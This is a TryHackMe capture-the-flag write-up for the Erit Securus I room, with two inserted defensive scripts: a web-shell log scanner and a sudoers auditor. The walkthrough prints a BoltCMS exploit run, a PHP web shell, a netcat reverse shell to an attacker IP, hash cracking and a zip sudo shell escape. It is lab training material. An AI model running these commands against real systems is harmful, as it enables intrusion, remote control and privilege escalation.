Erit Securus I TryHackme Writeup

By Shamsher Khan. This is a writeup of the TryHackMe room “Erit Securus 1”.

Room link: https://tryhackme.com/room/eritsecurusi
Note: This room is for Premium Members only (those who have purchased a THM Premium membership).

Difficulty level: Easy
Aim: Learn to exploit the BoltCMS software by researching exploit-db. Capture the flags via pivoting and multiple privilege escalation techniques.

Information Gathering

The target IP address is provided when the machine is deployed.

Target: 10.10.196.105

Scanning

We can run a simple nmap scan to look for open ports and services:

nmap -sV 10.10.196.105

From this we can see the following:

  • port 22/tcp — SSH — (OpenSSH 6.7p1)
  • port 80/tcp — HTTP — (nginx 1.6.2)

Question 1. How many ports are open?

Answer: 2

Question 2. What ports are open? Comma separated, lowest first: **,**

Answer: 22,80

Enumeration

The CMS that the website is built on can be found in the http-generator field of the nmap scan. This can also be determined by viewing the website via the browser and scrolling to the bottom of the page:

We can use exploit-db to search for an exploit for this particular CMS. The first result, an RCE vulnerability dated 2020-04-06, sounds promising:

A proof-of-concept Python script can be downloaded from exploit-db or GitHub.

The exploit requires authentication, which means we will require a username and password to proceed. We could attempt to brute force this, but these credentials can be easily guessed using a few simple username/password combinations on the login page.

(To find the login page, simply search Google for ‘bolt default login’; the link to the Bolt documentation shows where it lives.)

Visit the Bolt online user manual to check the section about login. We are told that the login page can be found under the /bolt directory.

There is no indication of default credentials. Let’s assume that there is an admin account and start with some basic passwords (admin, password, …). It worked with admin:password.

Question 1. What CMS is the website built on?

Answer: bolt

Gaining Access

We are now ready to run the exploit script against the target:

python3 exploit.py http://10.10.116.95 admin password

Now that we have access, we can create a simple PHP shell on the server:

echo '<?php system($_GET["cmd"]);?>' > cmd.php

This can then be used to upload netcat for a reverse shell (there is no netcat on the target machine). First, create a symbolic link to the local netcat binary in the current directory of our attacking machine, so it can be served from there. Run this command in a local terminal:

ln -s $(which nc) .

A simple web server can then be started locally in order to serve the file to the target:

python -m SimpleHTTPServer 80

Using the PHP shell, we download netcat from our web server onto the target and then make it executable via the browser:

http://10.10.196.105/files/cmd.php?cmd=chmod 755 nc

Next we need to start a netcat listener on our local machine

nc -nlvp 1234

Finally, we can trigger this connection via the browser to get our reverse shell:

http://10.10.196.105/files/cmd.php?cmd=./nc -e /bin/bash 10.2.12.26 1234

Our reverse shell can then be upgraded to a fully interactive TTY shell by running:

python -c 'import pty;pty.spawn("/bin/bash")'
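From the defender's side, the whole chain above leaves a clear trail in the nginx access log: a PHP file being executed from Bolt's /files/ upload directory, with a query parameter carrying shell syntax. The following detection is an added example, not part of the original writeup; the log lines are constructed to mirror the requests shown in this section.

```python
"""Flag web-shell style requests in nginx access logs (added example).

The sample lines are constructed. Detection keys on two things the
walkthrough shows: PHP executed under the /files/ upload directory,
and a query parameter whose value looks like a shell command.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in nginx "combined" format.
SAMPLE_LOG = """\
10.2.12.26 - - [06/Apr/2021:10:01:02 +0000] "GET /files/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.2.12.26 - - [06/Apr/2021:10:02:15 +0000] "GET /files/cmd.php?cmd=chmod%20755%20nc HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.2.12.26 - - [06/Apr/2021:10:02:40 +0000] "GET /files/cmd.php?cmd=./nc%20-e%20/bin/bash%2010.2.12.26%201234 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.2.12.26 - - [06/Apr/2021:10:03:00 +0000] "GET /bolt/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')
# Shell syntax that has no business in an ordinary query parameter.
SHELL_RE = re.compile(r'(^|[\s;|&])(nc|sh|bash|chmod|wget|curl|python)\b|/bin/|\s-e\s')

def scan_access_log(text):
    """Return one dict per suspicious request, with the reasons it was flagged."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["url"])
        reasons = []
        # PHP inside the upload directory is a dropped web shell until proven otherwise.
        if parts.path.startswith("/files/") and parts.path.endswith(".php"):
            reasons.append("php-under-upload-dir")
        # parse_qs already URL-decodes; unquote is harmless on decoded input.
        for name, values in parse_qs(parts.query).items():
            for v in values:
                if SHELL_RE.search(unquote(v)):
                    reasons.append(f"shell-syntax-in-param:{name}")
        if reasons:
            findings.append({"ip": m["ip"], "time": m["ts"],
                             "path": parts.path, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The two cmd.php requests are flagged on both counts; the image fetch and the /bolt/login hit are not.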

Question 1. What is the username of the user running the web server?

Answer: www-data

Privilege Escalation

In the /app/database directory you will find the database file: bolt.db

We can access this SQLite 3.x database and run the .tables command to display the database tables:

The bolt_users table looks interesting; let’s have a look at that:

SELECT * FROM bolt_users;

Two users are listed — admin and wileec (Wile E Coyote). There is also an IP address of 192.168.100.1, which might come in handy later.

We’re already admin, so let’s try to crack the hash of wileec using John the Ripper and the rockyou wordlist.

First, copy the hash to a file and then run:

john hash.txt -w=/usr/share/wordlists/rockyou.txt

This allows us to switch user to wileec and obtain the first flag:

Pivoting

It appears that wileec also has an ssh private key:

We can use this to try connecting using the internal IP address we found in the bolt_users table of the SQLite database:

Great, it worked… and, even better, we have some sudo privileges:

Question 1. User wileec can sudo! What can he sudo?

Answer: (jsmith) NOPASSWD: /usr/bin/zip

Privilege Escalation #2

We can use the /usr/bin/zip binary to elevate our privileges once again to become user jsmith:

TF=$(mktemp -u)
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'

Awesome! We are now jsmith.

Once again, we can upgrade to a fully interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Next, we can change to the user’s home directory and grab the second flag:

Taking a look at the sudo privileges for jsmith, we can see that this user can literally run any command without a password! From here, we can simply switch to root, change to the /root directory and grab the final flag:

Question 1. What sudo rights does jsmith have?

Answer: ALL : ALL NOPASSWD: ALL
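Both escalations on this box come from the sudoers file: a NOPASSWD rule for a binary with a known shell escape (zip with -TT, used above), and a NOPASSWD rule for ALL. The audit below is an added example, not part of the original writeup; the sudoers content is constructed to mirror what `sudo -l` showed for wileec and jsmith, and the shell-escape list is a small hypothetical subset.

```python
"""Audit sudoers entries for the weaknesses this box relies on (added example).

The sudoers text is constructed. SHELL_ESCAPES is a small hypothetical
subset of binaries with a documented way to spawn a shell under sudo;
zip is on it because of the -TT trick used in this walkthrough.
"""
import re

SHELL_ESCAPES = {"/usr/bin/zip", "/usr/bin/vim", "/usr/bin/less", "/usr/bin/find"}

# Constructed sudoers content.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
wileec  ALL=(jsmith) NOPASSWD: /usr/bin/zip
jsmith  ALL=(ALL : ALL) NOPASSWD: ALL
backup  ALL=(root) /usr/bin/rsync
"""

# user  host=(runas) [TAG: ...] command[, command...]
ENTRY_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$')

def audit_sudoers(text):
    """Return (user, runas, command, finding) tuples for risky entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        m = ENTRY_RE.match(line)
        if not m:
            continue  # Defaults lines, aliases, etc. are not user specs
        nopasswd = "NOPASSWD" in m["tags"]
        runas = m["runas"].replace(" ", "")
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd == "ALL" and nopasswd:
                # Any command, as any user, with no password: full compromise.
                findings.append((m["user"], runas, cmd, "nopasswd-all-commands"))
            elif cmd.split()[0] in SHELL_ESCAPES:
                # The binary itself is the problem; NOPASSWD just removes the last hurdle.
                why = "shell-escape-binary" + ("-nopasswd" if nopasswd else "")
                findings.append((m["user"], runas, cmd, why))
    return findings

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

The root entry (password required, and root anyway) and the rsync entry are not reported; the wileec and jsmith rules are.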

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
